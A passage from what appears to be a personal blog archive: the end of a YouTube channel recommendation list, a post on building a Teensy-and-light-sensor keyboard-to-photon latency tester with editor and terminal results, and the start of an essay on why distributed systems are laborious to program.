I’ve dedicated C tier to channels where I watch them purely to marvel at someone being really good at something. I like watching people do impressive things or perform at the highest level, it’s inspiring and also just cool to learn about how they do it. They don’t necessarily have to be impressive in an absolute sense, although many are, just impressive relative to my skill level (often zero in their area). The reason these aren’t in higher tiers is either that I’m not as interested in the subject but they captured me anyways, or their videos are not as high in density and quality.

Pannen: Details various glitches used for an automated Super Mario 64 speedrun where he tries to minimize use of the A (jump) button. Really interesting just seeing how insane the tricks can be. Best and most famous video is this commentated one from his other channel about parallel universes.
Daniel Schiffer: Videographer who goes into how he shoots and edits commercials, and he’s really good at it so his videos are great.
Tucker Gott: Paramotor pilot. I have no plans on ever paramotoring but it’s cool to watch and his “Reacting To Crash Videos” series is really interesting, seeing him break down what kind of safety considerations come into play and how things can go wrong.
Akiyuki Brick Channel: Incredibly cool and complex Lego mechanical contraptions. This is a great combination of many of his designs and this recent video is aesthetically fun.
GeoWizard: Guy who is really good at GeoGuessr and super knowledgeable about geography and all sorts of tricks to figure out where you are when plopped randomly on Street View. This guy is allegedly better but IMO less entertaining.
Media Molecule: Lots of videos about Dreams, the most impressive feat of software engineering I can think of, but that’s another potential future article. Includes compilations of cool creations, tutorials from talented artists, and explanations by developers of how it works.
Jonathan Blow: Recorded live streams of programming and demoing his game and new programming language/compiler. Clearly very skilled, also overly brash at times, but his ideas and perspective are interesting and his videos are the only ones I watch of live programming.
Sethbling: Does Super Mario World speedruns involving code injection via carefully placed shells and a glitch to warp directly to the credits, as well as various other technical video game trickery.
Harstem: Professional StarCraft 2 player. Critiques people’s submitted replays, plays serious games while explaining his thoughts, tries playing with terrible strategies and winning purely on having better mechanics. Interesting to see what kind of thought, considerations and practice it takes to get to the highest level in a competitive strategy game.

D Tier: Good quality stuff I like watching

These are just a whole bunch of channels I’m subscribed to, where I’ve watched a bunch of their videos and liked them. I may not watch every video from all of these channels, but the ones I’ve decided to watch have been good and I’ll often watch new ones when they pop up. Some of these channels are really well made and might be in other people’s S tier, I’m just not as interested in them. If you’ve liked my other recommendations I encourage you to check these out! I’ve split them up based on the broad theme of what type of videos they have:

Explaining

Two Minute Papers: Short explanations of interesting machine learning and computer graphics papers.
Makin’ Stuff Look Good: Tutorials on how various cool shader effects work.
Keystone Science: Some cool science videos.
Cody’sLab: Miscellaneous geology, farming and engineering.
Blender Guru: Really good Blender 3D modeling tutorials. I learned a lot about what goes into photorealism that I applied when choosing features for my path tracer.
Bruce Yeany: Science teacher who makes cool demonstrations.
Smarter Every Day: Very popular science and engineering videos.
AvE: Crass guy with an idiosyncratic style of speaking has a cool series called “Bored Of Lame Tool Review?” where he takes tools apart, explains how they work, critiques their design and guesses how they’ll fail.

Making

bitluni’s lab: PCBs and neat huge LED walls.
Strange Parts: Tours of cool Chinese factories.
James Bruton: 3D printed cool robots.
Brick Experiment Channel: Interesting engineering using Lego, like making submarines.
Simone Giertz: Originally made shitty robots, now makes miscellaneous cool artsy objects.
BPS.space: Very fancy model rockets with cool control systems, like Falcon propulsive landing.
Allen Pan: Cool engineering projects kind of in the style of The Hacksmith.
Mark Rober: Interesting engineering and science projects.
Peter Sripol: Makes his own small and model airplanes.
Michael Reeves: Comedy robot videos.
I Like To Make Stuff: Miscellaneous crafts.
Jairus of all: Some cool projects.
Breaking Taps: CNC milling, making molds. Well produced, good at explaining the challenges and design process.
How To Make Everything: Makes things like lenses, chocolate, clothing and food from scratch harvesting and processing all his own materials.
Matthias Wandel: Impressive woodworking and wooden contraptions.
The Taste Emporium: Cooking channel by the same guy as The Thought Emporium about making very fancy recipes.
Joseph’s Machines: Really amazing Rube Goldberg machines.
Makercise: Making a Gingery lathe and shaper from scratch by aluminum casting.
EvanAndKatelyn: Miscellaneous home crafts and art.
I did a thing: Comedy DIY videos like “Can I make a spoon using only a spoon”.
DIY Perks: Well-made DIY projects mostly building custom lighting and weird computer equipment.
Ferris: Really good programmer, part of my favorite demo group Logicoma, interesting streams.
The Brick Wall: Sophisticated and impressive working Lego farm equipment and factories.
Colin Furze: Wild engineering projects often involving making dangerous but impressive vehicles.

Other

JL2579: Technical Minecraft player. I don’t play Minecraft anymore but still love seeing what kind of weird behaviors they find and exploit to build useful Minecraft contraptions.
ilmango: Another impressive technical Minecraft player.
Curry On!: A good programming conference that tends to have talks I like watching.
Strange Loop: Another good programming conference with lots of talks I’ve liked.
Roger Kilmanjaro: Really beautiful minimalist CG looping animations that are very much my aesthetic.

Measuring keyboard-to-photon latency with a light sensor

2020-05-20T00:00:00+00:00

For a long time when I’ve wanted to test the latency of computers and UIs I’ve used the Is It Snappy app with my iPhone’s high speed camera to count frames between when I press a key and when the screen changes. However the problem with that is it takes a while to find the exact frames you want, which is annoying when doing a bunch of testing. It also makes it difficult to find out what the variability of latency is like. I had already made this kind of testing easier by adding a mode to my keyboard firmware which changes the LED color after it sends a USB event, but that only made it a bit faster and more precise. I wanted something better.

So I followed in the footsteps of my friend Raph and made a hardware latency tester which sends keyboard events and then uses a light sensor to measure the time it takes for the screen to change! It was quite easy and in this post I’ll go over some of the latency results I’ve found, talk about why good latency testing is tricky, and explain how to build your own latency tester.

Basically my latency tester is a light sensor module from Amazon held by an adjustable holder arm wired to a Teensy LC microcontroller which presses “a” and waits until the light level changes, then deletes it and keeps collecting samples as long as a button is held. Then with a short press of that one button it will type out a nice latency histogram that looks like this:

lat i= 60.3 +/-   9.3, a= 60, d= 59 (n= 65,q= 41) |    239_                      |

This line tells me the average latency of insertions (i=), deletions (d=) and both put together (a=), the standard deviation of insertion times (+/-), measurement count (n=) and quality (q=), and a little ascii histogram where each character is a 10ms bucket and the digits proportionally represent how full the bucket is. The _ represents a bucket with at least one sample but not enough to be at least one ninth of the top bucket, so I can see tail latencies. Here’s what it looks like (pictured with portrait monitors but all tests were done in landscape):

I also made it so if you press the button again, it will type out all the raw measurements like [35, 35, 33, 44] so you can do custom plotting:
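If you want to reproduce the one-line histogram from raw measurements like these, here's a rough Python sketch of the format described above. It isn't the firmware's code: the function name, the default of 30 buckets and the use of integer (floor) scaling are my assumptions, picked so that a bucket below one ninth of the top bucket comes out as `_`.

```python
def ascii_histogram(samples_ms, bucket_ms=10, num_buckets=30):
    """Render latency samples as a fixed-width one-line histogram.

    Each character is one bucket of `bucket_ms` milliseconds. A digit 1-9 shows
    how full the bucket is relative to the fullest bucket, '_' marks a bucket
    with at least one sample but under one ninth of the fullest, and a space
    marks an empty bucket.
    """
    counts = [0] * num_buckets
    for sample in samples_ms:
        # Clamp very slow samples into the last bucket so the width stays fixed.
        index = min(int(sample // bucket_ms), num_buckets - 1)
        counts[index] += 1

    top = max(counts)
    chars = []
    for count in counts:
        if count == 0:
            chars.append(" ")
        else:
            digit = (count * 9) // top  # floor scaling: the top bucket is 9
            chars.append(str(digit) if digit >= 1 else "_")
    return "|" + "".join(chars) + "|"


# Made-up samples: mostly 60-69ms, some faster ones, and one slow outlier.
samples = [45] * 4 + [55] * 6 + [65] * 18 + [75]
print(ascii_histogram(samples, num_buckets=10))  # prints "|    239_  |"
```

The single outlier at 75ms still shows up as `_`, which is the point of that character: tail latencies stay visible even when they're rare.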

Monitor latency

I’ll start out with my favorite set of results:

Sublime Text, macOS, distraction-free full-screen mode on two 4k monitors:
lat i= 35.3 +/-   4.7, a= 36, d= 36 (n= 67,q= 99) |  193       | Dell P2415Q top
lat i= 52.9 +/-   5.0, a= 53, d= 54 (n= 66,q= 45) |   _391     | Dell P2415Q bottom
lat i= 65.1 +/-   5.0, a= 64, d= 63 (n=109,q=111) |    _292    | HP Z27 top
lat i= 79.7 +/-   5.0, a= 80, d= 80 (n= 98,q=114) |       89_  | HP Z27 bottom

There’s a lot to observe here:

First of all, I like how the single-line fixed-width histogram format lets me put results next to each other in a text file and label them to the right for comparison.
We can see the expected difference of 16ms between the latency at the top and bottom of each monitor from the time it takes to scan out the rows during a frame at 60hz.
The standard deviation is just a touch over the 4.6ms that’s inherent to the uniformly-distributed variance that comes from being misaligned with a 16ms display refresh period.
The HP Z27 is around 30ms slower than the Dell P2415Q! And that’s measuring from the start of when the change is detectable, I’m pretty sure the Z27 also takes longer to transition fully. With the Z27 and Sublime almost half my end-to-end latency is unnecessary delay from the monitor!
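The 4.6ms figure comes from the standard deviation of a uniform distribution, which is the width of the interval divided by the square root of 12. Here's a tiny Python check of that arithmetic, using the same rounded 16ms refresh period as above (the function name is just for illustration). The same formula applies to the USB polling intervals discussed later.

```python
import math


def uniform_std_ms(period_ms):
    """Standard deviation of a delay spread uniformly over [0, period_ms)."""
    return period_ms / math.sqrt(12)


for label, period_ms in [
    ("16ms display refresh", 16.0),
    ("8ms USB polling (125hz)", 8.0),
    ("1ms USB polling (1000hz)", 1.0),
]:
    print(f"{label}: +/- {uniform_std_ms(period_ms):.2f}ms")
# The first line prints "+/- 4.62ms", matching the ~4.6ms floor mentioned above.
```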

All measurements in the rest of this post are accordingly done on my Dell P2415Q. Both monitors have response time set to “fast”, the Z27 has even higher response time settings but they only affect transition time and introduce unsightly ghost trails without helping initial latency.

The perils of measurement

Taking good latency measurements is actually quite difficult in more ways than you might think. I tried harder than most people to get realistic measurements and still failed the first few times in ways that I had to fix.

Actually measuring end to end latency

First of all, the reason to use a hardware latency tester is that there are many incomplete or potentially deceptive ways to measure end-to-end latency.

There’s a really excellent famous blog post called Typing With Pleasure that compares latency of different text editors on different operating systems with good analysis and pretty graphs. However it does this by simulating input events and screen scraping using OS APIs. I haven’t done any overlapping measurements with his so can’t point to anything specifically wrong, but there’s lots of potential issues with this. For example inspecting the screen buffer on the CPU might unduly penalize GPU-rendered apps due to window buffer copies under some ways that capture might work. Simulated input may hit different paths than real input. Regardless, even if it does give decent relative measurements (and you can’t truly know without validating it against an end-to-end test), it doesn’t tell you the full latency users experience.

Using 1000hz USB polling

One source of latency users experience that my tester doesn’t measure is keyboard latency. Many keyboards can introduce more latency than my entire keyboard-to-photon latency (including mine in the past) due to 8ms USB polling intervals, low keyboard grid scan rates, slow firmware, and more debatably different mechanical design.

You can’t just use any microcontroller that can emulate a keyboard to build a low-variance latency tester because they probably use default 125Hz polling. Luckily my go-to microcontroller the Teensy LC is one of few to default to 1000hz.

Ensuring good signal strength

For the first while after I built my latency tester I didn’t have any measurement of signal strength. Eventually I got confused by some measurements in slightly different scenarios with the same app and screen having wildly different results. I did some testing and figured out that sometimes with small fonts or poor sensor placement the change in screen contents would only barely be detectable so I’d end up measuring until the monitor finished transitioning when usually I measure until when the monitor starts transitioning (which is its own tricky subjective measurement choice).

I knew to suspect transition time, because before I wrote the firmware I played around with just sampling the light sensor every millisecond and using the Arduino serial plotter to plot measurements as I typed and backspaced a letter just to see what the signal looked like. You can see that some combination of the light sensor and the monitor take nearly 100ms to fully transition. Based on filming with Is It Snappy it seems like it only takes my Z27 about 20ms for the screen to perceptually finish transitioning.

To avoid this I added a peak to peak signal strength measurement after the full transition to my output so I could ensure I was getting adequate resolution for my threshold of 5 steps to be near the beginning of the transition. These are the numbers you see after q=. I learned that it’s important to keep font sizes large and screen brightness settings high.
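To make the effect of signal strength concrete, here's a simplified Python sketch of threshold detection on a light sensor trace sampled once per millisecond. This is an illustration rather than the firmware itself: the function name and the made-up sample values are assumptions, and only the threshold of 5 steps and the peak to peak quality number come from the description above.

```python
def analyze_transition(samples, threshold=5):
    """Find when a sensor trace first moves `threshold` steps off its baseline.

    `samples` holds one sensor reading per millisecond, starting at the moment
    the key event was sent. Returns (latency_ms, quality): latency_ms is the
    index of the first reading at least `threshold` steps away from the first
    reading (None if that never happens), and quality is the peak to peak
    swing over the whole trace.
    """
    baseline = samples[0]
    latency_ms = None
    for i, value in enumerate(samples):
        if abs(value - baseline) >= threshold:
            latency_ms = i
            break
    quality = max(samples) - min(samples)
    return latency_ms, quality


# Hypothetical traces: both screens start changing at 30ms, but the weak one
# (small font or poor sensor placement) barely changes the light level.
strong = [100] * 30 + [102, 104, 107, 115, 130, 150] + [160] * 20
weak = [100] * 30 + [101, 102, 103, 104, 105, 106] + [106] * 20

print(analyze_transition(strong))  # prints (32, 60)
print(analyze_transition(weak))    # prints (34, 6)
```

With the weak signal the threshold is only crossed near the end of the transition, so the measured latency drifts later even though the screen started changing at the same time. A low quality number is the warning sign for that.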

Significant variation from small differences

It’s possible for seemingly small differences in what’s being measured to make noticeable differences in latency. For example I wanted to see if there was a significant difference between the latency of Sublime and VSCode on a small file with plain text highlighting compared to a large file with a complex highlighting grammar and an autocomplete popup. Sure enough there was, but after noticing some variability I did a bunch more testing and discovered that the latencies were noticeably different between typing ‘a’ on a blank line and typing ‘a’ after an existing ‘a’ (‘aa’).

Here’s the results upon making a new line after line 3469 of 6199 of the huge parser.rs, all taken with similar sensor positioning lower down my Dell monitor than the very top.

lat i= 40.2 +/-   4.1, a= 40, d= 39 (n= 38,q= 90) |  _89           | sublime small .txt

lat i= 41.2 +/-   6.9, a= 41, d= 42 (n= 54,q= 92) |   992          | sublime aa parser.rs
lat i= 43.6 +/-   6.1, a= 43, d= 42 (n= 48,q=100) |   492          |
lat i= 52.2 +/-   6.0, a= 52, d= 52 (n= 26,q=100) |    49          |
lat i= 44.3 +/-   5.6, a= 43, d= 42 (n= 45,q=100) |   391          |
lat i= 42.7 +/-   7.6, a= 42, d= 42 (n= 46,q=100) |  _491          |

lat i= 48.1 +/-   6.8, a= 49, d= 50 (n= 43,q= 89) |   269          | sublime a parser.rs
lat i= 43.9 +/-   5.4, a= 48, d= 52 (n= 32,q= 97) |   197          |
lat i= 47.8 +/-   8.4, a= 49, d= 49 (n= 29,q= 97) |   197_         |
lat i= 46.1 +/-   6.8, a= 47, d= 49 (n= 42,q= 97) |   196_         |

lat i= 63.3 +/-   9.3, a= 63, d= 62 (n= 68,q=118) |    _963__      | vscode aa parser.rs
lat i= 63.6 +/-   7.6, a= 64, d= 65 (n= 71,q=139) |    _49__     _ |
lat i= 62.3 +/-   6.3, a= 61, d= 59 (n= 52,q=132) |    _791        |
lat i= 62.0 +/-   5.8, a= 61, d= 60 (n= 40,q=111) |    _49_        |
lat i= 61.9 +/-   9.7, a= 62, d= 61 (n= 35,q=111) |     981_       |

lat i= 53.1 +/-   7.7, a= 51, d= 49 (n= 54,q=116) |   _79__        | vscode a parser.rs
lat i= 52.2 +/-   6.3, a= 52, d= 51 (n= 41,q=133) |    692         |
lat i= 53.2 +/-   7.8, a= 52, d= 52 (n= 57,q=134) |    591_        |
lat i= 52.1 +/-   7.1, a= 52, d= 52 (n= 55,q=134) |    591_        |

I did a bunch of runs at different times and with minor changes to confirm the effect, and you can see that there’s variation between measurements of the same scenario, but noticeably larger variation between just typing ‘a’ and adding an ‘a’ after an existing ‘a’. Try looking at the ‘a=’ column since it includes both insert and delete measurements so has the least cross-run noise. Sublime is faster at ‘aa’ than ‘a’ and VSCode is faster at ‘a’ than ‘aa’.

In both editors ‘aa’ causes the autocomplete popup to alternate between two lists and ‘a’ causes it to appear and disappear. I can guess that Sublime might be slower in the ‘a’ case because opening and closing the autocomplete popup has a cost, but I don’t have a strong hypothesis why VSCode is slower in the ‘aa’ case on both insertion and deletion.

Jittering so as not to sync with refresh

The next fishy thing I noticed is that my variances seemed too low. I was sometimes getting standard deviations of 1ms when my understanding of how the system worked said I should be getting a standard deviation over 4.6ms due to 16ms screen refresh intervals.

I looked at my code and figured out that I was inadvertently synchronizing my measurement with screen refreshes. Whenever I measured a change, my firmware would wait exactly 300ms before typing ‘a’ or backspace again and taking another measurement. This meant the input was always sent about 300ms after a screen refresh and thus would land at a fairly constant spot in the screen refresh interval. I patched this issue by adding a 50ms random delay between measurements.
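Here's a small Python simulation of that synchronization effect. It's a toy model with made-up parameters, not a model of any real app: the screen refreshes every 16ms, the app needs a fixed 25ms to get a change ready, the change becomes visible at the next refresh, and the tester sends its next input 300ms after seeing the change, plus an optional random delay.

```python
import math
import random
import statistics


def latency_std_ms(jitter_ms, n=2000, period_ms=16.0, app_ms=25.0,
                   wait_ms=300.0, seed=0):
    """Standard deviation of simulated latencies for a given random jitter."""
    rng = random.Random(seed)
    t = 0.0  # time the current input is sent
    latencies = []
    for _ in range(n):
        ready = t + app_ms
        # The change only becomes visible on the next refresh boundary.
        shown = math.ceil(ready / period_ms) * period_ms
        latencies.append(shown - t)
        # Wait a fixed time after seeing the change, plus optional jitter.
        t = shown + wait_ms + rng.uniform(0.0, jitter_ms)
    return statistics.pstdev(latencies)


print(f"no jitter:   +/- {latency_std_ms(0.0):.1f}ms")
print(f"50ms jitter: +/- {latency_std_ms(50.0):.1f}ms")
```

Without jitter every input lands at the same point in the refresh interval, so the simulated standard deviation collapses to nearly zero. With up to 50ms of random delay the inputs spread across the interval and the standard deviation comes back to roughly the 4.6ms expected from a 16ms refresh period.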

This mainly leads to incorrectly low variances, but it might lead to incorrect averages as well: if the app would miss a paint deadline when an input event arrives late in a frame, a synchronized test that never sends input late in a frame will never see that slower case. I found this during testing for this post and couldn’t be bothered to redo all the tests below this point, so you may notice some low variances, but I did recheck the averages on important results like Sublime and VSCode.

Text editors

I tested the latency of a bunch of text editors on the same plain text file, but note that, as explained above, these measurements were taken before I added jittering. I did do more tests on Sublime and VSCode after adding jittering, which you can see above.

lat i= 32.5 +/-   4.0, a= 34, d= 35 (n= 38,q= 78) |   9_          | sublime text
lat i= 33.4 +/-   1.4, a= 33, d= 33 (n= 68,q= 23) |  _9           | textedit
lat i= 47.6 +/-   7.0, a= 47, d= 47 (n= 71,q=130) |   219         | vscode
lat i= 34.2 +/-   3.5, a= 34, d= 33 (n= 57,q= 37) |   9 _         | chrome html input
lat i= 33.2 +/-   1.1, a= 33, d= 33 (n= 55,q= 30) |   9           | stock mac emacs
lat i= 45.6 +/-   7.0, a= 43, d= 41 (n= 35,q= 56) |   992_        | atom
lat i= 35.0 +/-   4.7, a= 35, d= 35 (n= 66,q= 11) |   9__         | xi

Given the lack of jitter, I’d interpret these results as everything except VSCode and Atom being similarly “basically as good as you can get”. And note that even VSCode and Atom have less of a latency penalty for normal typing than you can easily have in your monitor or keyboard.

Terminals

I also measured different terminals. It looks like the default Apple Terminal and kitty have similar approximately optimal latency, while iTerm2 and Alacritty have worse latency.

lat i= 53.1 +/-   6.6, a= 54, d= 55 (n= 53,q= 59) |    291      _ | iterm2 gpu render
lat i= 50.5 +/-   2.5, a= 50, d= 50 (n= 56,q= 59) |    19_        | iterm2 no gpu
lat i= 35.8 +/-   7.0, a= 34, d= 33 (n= 73,q= 48) |   9___        | apple terminal
lat i= 35.1 +/-   2.5, a= 34, d= 32 (n= 35,q= 52) |   9_          | apple terminal vim
lat i= 50.4 +/-   3.9, a= 50, d= 49 (n= 60,q=269) |   _59         | alacritty
lat i= 36.1 +/-   5.6, a= 35, d= 34 (n= 78,q=199) |   9__         | kitty

How to make one

Here’s the parts list I used:

$12: A Teensy LC or any other Teensy 3+. You could also use an Arduino, but the Teensy’s USB library uses 1000hz polling (1ms latency) while most USB devices default to 125hz (an extra 8ms of random latency in your measurements). It’s possible you may be able to get your microcontroller of choice to do 1000hz polling though. If you don’t want to have to solder the pins, buy one with pre-soldered pins, this might require getting the more expensive Teensy 3 if you want Amazon Prime shipping.
$12: A light sensor module (Amazon only has 10 packs, I only used 1). You could make your own circuit for this but these modules save a lot of time and are easy to integrate.
$13: A helping hand to hold the light sensor up to your screen in a stable position.
A button/switch of some kind to trigger testing
Wires to connect the light sensor, Teensy, and button
Electrical tape to make a black soft shield to restrict the view of the sensor
A USB micro-B cable to connect the Teensy to your computer

There’s an awful lot of flexibility in exactly how you assemble it. You just need to somehow connect 3 wires (3V, ground, analog out) from the light sensor module to the corresponding pins on the Teensy (3V, ground and any analog-capable pin). The easiest way to do this which doesn’t even require any soldering if you buy a Teensy with pre-soldered header pins is to use 3 female to female jumper wires. Then you just need some kind of switch to activate the latency test where you wire one pin to ground on the Teensy and another pin to a digital IO pin. This can be as simple as two wires that you touch together if you’re really lazy!

To make sure the light sensor module only sees a limited area of the screen I wrapped the sensor in a little cylinder of electrical tape and snipped off the end cleanly with scissors. This made a little round window I could press up against the screen with the helping hand to minimize outside interference and get the cleanest signal.

I had already made a foot pedal box with a Teensy LC and a little breadboard inside, and it had an extra TRRS jack on the side I had put on anticipating this sort of project, so for me the project was soldering the light sensor module to a TRRS cable. Then I could just use one of my existing foot pedals to control the testing!

For the soldering I was in luck since I had conveniently bought magnetic helping hands for the project which I could use for the soldering process. Inconveniently I realized that I actually didn’t own many substantial chunks of iron for them to attach to, so I ended up using a cast iron pan when soldering and my tungsten cube when on my desk (which turns out to be slightly ferromagnetic).

I encourage you to have fun and try to make something fancier than just dangling jumper wires. For my foot pedal box I bought a plastic project box from a local electronics shop, used a drill press to put some holes in the sides and installed large and small headphone jacks and a little breadboard so I could reconfigure how things connect. There’s tons of foot pedals on Amazon for tattoo machines and electric pianos that use 1/4” phone plugs that you can pick and choose from. These are my favorites for feel and silence but there are cheaper options that can be unreliable, hard to press or loud.

I wouldn’t recommend following my use of a TRRS jack for the sensor module though, they’re nice and small and there’s lots of cables available, but I used them before I realized the problem that they cause a lot of shorting of different connections when plugging and unplugging. I tried to minimize this by putting power and ground on opposite ends, but you should consider some better cable type like maybe a phone cable.

The firmware

I didn’t write the fanciest possible firmware to find the beginning and ending of the transition, but I put a bit of effort into tweaking it to work well and adding various features so I recommend starting with my firmware. Install the Teensyduino software and then you can use my latency tester Arduino sketch which also doubles as foot pedal box code but you can comment that stuff out and configure it to use the right pins. Then just long press your switch to take samples and short press to type out the results!

Fragile narrow laggy asynchronous mismatched pipes kill productivity

2020-05-17T00:00:00+00:00

Something I’ve been thinking about recently is how when I’ve worked on any kind of distributed system, including systems as simple as a web app with frontend and backend code, probably upwards of 80% of my time is spent on things I wouldn’t need to do if it weren’t distributed. I came up with the following description of why I think this kind of programming requires so much effort: Everything is fragile narrow laggy asynchronous mismatched untrusted pipes. I think every programmer who’s worked on a networked system has encountered each of these issues, this is just my effort to coherently describe all of them in one place. I hope to prompt you to consider all the different hassles at once and think about how much harder/easier your job would be if you did/didn’t have to deal with these things. I think this is part of why web companies like Twitter seem to have so much lower impressiveness per engineer productivity than other places like game companies or SpaceX, although there’s other pieces to that puzzle. While part of the difficulty of distributed systems is inherent in physics, I think there’s lots of ideas for making each part of the problem easier, many already in common use, and I’ll try to mention lots of them. I hope that we as programmers continually develop more of these techniques and especially general implementations that simplify a problem. Like serialization libraries reducing the need for hand-written parsers/writers, I think there’s a lot of developer time out there to save by implementing generalized solutions where we currently painstakingly reimplement common patterns. I also think all these costs mean you should try really hard to avoid making your system distributed if you don’t have to.

I’ll go over each piece in detail, but briefly, whenever we introduce a network connection we usually have to deal with something that is:

Fragile: The network connection or the other end can have hardware failures, these have different implications but both manifest as just a timeout. Everything needs to handle failure.
Narrow: Bandwidth is limited so we need to carefully design protocols to only send what they need.
Laggy: Network latency is noticeable so we need to carefully minimize round-trips.
Asynchronous: Especially with >2 input sources (UIs count) all sorts of races and edge cases can happen and need to be thought about and handled.
Mismatched: It’s often not possible to upgrade all systems atomically, so you need to handle different ends speaking different protocol versions.
Untrusted: If you don’t want everything to be taken down by one malfunction you need to defend against invalid inputs and being overwhelmed. Sometimes you also need to defend against actual attackers.
Pipes: Everything gets packed as bytes so you need to be able to (de)serialize your data.

All of these things can be mostly avoided when programming things that run on one computer, that is unless you end up optimizing performance and realizing your computer is actually a distributed system of cores and some of them come back. Some domains manage to avoid some of these but I’ve experienced subsets of these problems working on web apps, self-driving cars, a text editor, and high-performance systems, they’re everywhere.

This isn’t even all the problems, just things about the network. Tons of effort is also expended on things like how various bottlenecks often entail a complicated hierarchy of caches that need to be kept in sync with the underlying data store.

One way you can avoid all this is to just not write a distributed system. There are plenty of cases you can do this and I think it’s worthwhile to try way harder than some people do to pack everything into one process. However past a certain point of reliability or scale, physics means you’re going to have to use multiple machines (unless you want to go the mainframe route).

Fragile

As you connect machines or increase reliability goals, the strategy of just crashing everything when one piece crashes (what multi-threaded/multi-core systems do) becomes increasingly unviable. Hardware will fail, wireless connections drop, entire data centers have their power or network taken out by squirrels. Some domains like customers with flaky internet also inevitably entail frequent connection failure.

In practice you need to write code to handle the failure cases and think carefully about what they are and what to do. This gets worse when merely noting the failure would drop important data, and you need to implement redundancy of data storage or transmission. Even worse, both another machine failing and a network connection breaking become visible just as some expected network packet not arriving after “too long”, introducing not only a delay but an ambiguity that can result in split-brain issues. Often something like TCP detects the failure for you but sometimes you have to implement your own heartbeating to periodically check that another system is still alive.
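As a minimal sketch of what hand-rolled heartbeating can look like, here's a Python failure detector that suspects a peer once nothing has been heard from it for longer than a timeout. The class and method names are hypothetical, and it leaves out actually sending and receiving the heartbeat packets. Note that it can only say "suspected": a dead machine and a broken connection look exactly the same from here.

```python
import time


class HeartbeatMonitor:
    """Tracks when each peer was last heard from and flags the quiet ones."""

    def __init__(self, timeout_s, clock=time.monotonic):
        self.timeout_s = timeout_s
        self.clock = clock  # injectable so tests don't need to sleep
        self.last_seen = {}

    def beat(self, peer):
        """Call whenever a heartbeat (or any message) arrives from `peer`."""
        self.last_seen[peer] = self.clock()

    def suspected_dead(self):
        """Peers that have been silent for longer than the timeout."""
        now = self.clock()
        return sorted(peer for peer, seen in self.last_seen.items()
                      if now - seen > self.timeout_s)


# Usage with a fake clock: "b" goes quiet while "a" keeps sending heartbeats.
fake_now = [0.0]
monitor = HeartbeatMonitor(timeout_s=3.0, clock=lambda: fake_now[0])
monitor.beat("a")
monitor.beat("b")
fake_now[0] = 2.0
monitor.beat("a")
fake_now[0] = 4.0
print(monitor.suspected_dead())  # prints ['b']
```

Choosing the timeout is the hard part: too short and a slow network looks like a crash, too long and everything waits on a peer that's already gone.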

Attempts to make this easier include exceptions, TCP, consensus protocols and off-the-shelf redundant databases, but no solution eliminates the problem everywhere. One of my favourite attempts is Erlang’s process linking, monitoring and supervising which offers a philosophy that attempts to coalesce all sorts of failures into one easier to handle general case.

Narrow

Network bandwidth is often limited, especially over consumer or cellular internet. It may seem like this isn’t a limitation very often because you rarely hit bandwidth limits, but that’s because limited bandwidth is ingrained into everything you do. Whenever you design a distributed system you need to come up with a communication protocol that communicates on the order of what’s necessary rather than on the order of the total size of your data.

In a multi-threaded program, you might just pass a pointer to gigabytes of immutable or locked data for a thread to read what it wants from and not think anything of it. In a distributed system passing the entire memory representing your database is unthinkable and you need to spend time implementing other approaches.

Multi-core systems are actually a certain kind of distributed system too: they employ protocols behind the scenes to transfer only the data that’s necessary, but those protocols involve many more broadcasts and round trips than would be viable with most networks. I actually think trying to apply techniques used to make multi-core machines seamless to distributed systems is a good way to think of neat solutions that might be much more general than you’d otherwise design. Similarly once you really start optimizing systems hard you notice that bandwidth inside your computer becomes a constraint too.

Dealing with low bandwidth usually involves a message type for each query or modification to a shared data structure, and deciding when to ship over more data so local interactions are faster, or less data to avoid terrible bandwidth cases. It often goes further to various types of replicated state machine where each peer updates a model based on a replicated stream of changes, because sending the new model after every update would be too much bandwidth. Examples of this range from RTS games to exchange feeds. However maintaining determinism and consistency in how each peer updates its state to avoid desyncs can be tricky, especially if different peers have different languages or software versions. You also often end up implementing a separate protocol for streaming a full snapshot, because replaying events from the beginning of time when connecting isn’t viable.
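To make the replicated state machine idea concrete, here is a small sketch. The `Replica` class, the event shapes and the JSON snapshot format are all made up for illustration. Each peer applies the same stream of changes deterministically, and a late joiner loads a snapshot instead of replaying from the beginning:

```python
import json


class Replica:
    """Keeps a key/value model in sync by applying a shared stream of changes."""

    def __init__(self):
        self.state = {}
        self.applied = 0  # number of events applied so far

    def apply(self, event):
        # Must be deterministic: same events in the same order give the same state.
        op, key = event["op"], event["key"]
        if op == "set":
            self.state[key] = event["value"]
        elif op == "delete":
            self.state.pop(key, None)
        else:
            raise ValueError("unknown op: %r" % op)
        self.applied += 1

    def snapshot(self):
        # Full-state transfer for peers that join late.
        return json.dumps({"state": self.state, "applied": self.applied}, sort_keys=True)

    @classmethod
    def from_snapshot(cls, blob):
        data = json.loads(blob)
        replica = cls()
        replica.state = data["state"]
        replica.applied = data["applied"]
        return replica


log = [
    {"op": "set", "key": "x", "value": 1},
    {"op": "set", "key": "y", "value": 2},
    {"op": "delete", "key": "x"},
]

first = Replica()
for event in log[:2]:
    first.apply(event)

# A late joiner loads a snapshot, then only needs the events after that point.
late = Replica.from_snapshot(first.snapshot())
for replica in (first, late):
    for event in log[replica.applied:]:
        replica.apply(event)
```

The snapshot path is a second protocol that has to stay consistent with `apply`, which is part of why this pattern takes more work than it first appears.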

Attempts to make this easier include RPC libraries just making it easier to send lots of different message types for different queries and updates rather than shipping data structures, caching libraries, and compression. Cool but less commonly used systems include things like Replicant that ensure synchronized state machine code and update streams on many devices to make replicated state machines easier and less fraught.

Laggy

One network round trip can’t be a problematic latency or you need better networking hardware or a different problem to solve. The difficulties come from avoiding implementing your solution in a way that needs too many network round trips. This can lead to needing to implement special combo-messages that do a sequence of operations on the server instead of just providing smaller primitive messages.

The web, with its especially large latencies, has had lots of problems of this type such as only having the font/image URLs after loading the HTML, or REST APIs that require multiple chained calls to get the IDs needed for the next. Lots of things have been built for these problems like resource inlining, HTTP/2 server push and GraphQL.

A cool somewhat general solution is Cap’n Proto promise pipelining and other systems that involve essentially shipping a chain of steps to perform to the other end (like SQL). These systems essentially send a limited type of program to perform on the server. Unfortunately you often run into the limitations of the language used, like you can’t add 1 to your Cap’n Proto result before passing it to a new call without a round trip. But if you make your language too powerful you can run into problems with the code you’re shipping overloading the server or being too big. Just adding a multi-step message for your use case is pretty easy if you control both ends, but can be harder if the other end is a company’s API for third parties, or even just owned by a different team at a big company, and those are the cases where they tend not to want to run your programs on their server. I think there’s lots more avenue for exploration here in terms of new approaches to sending segments of code while re-using sent code to save bandwidth and limiting the potential for it to do damage.
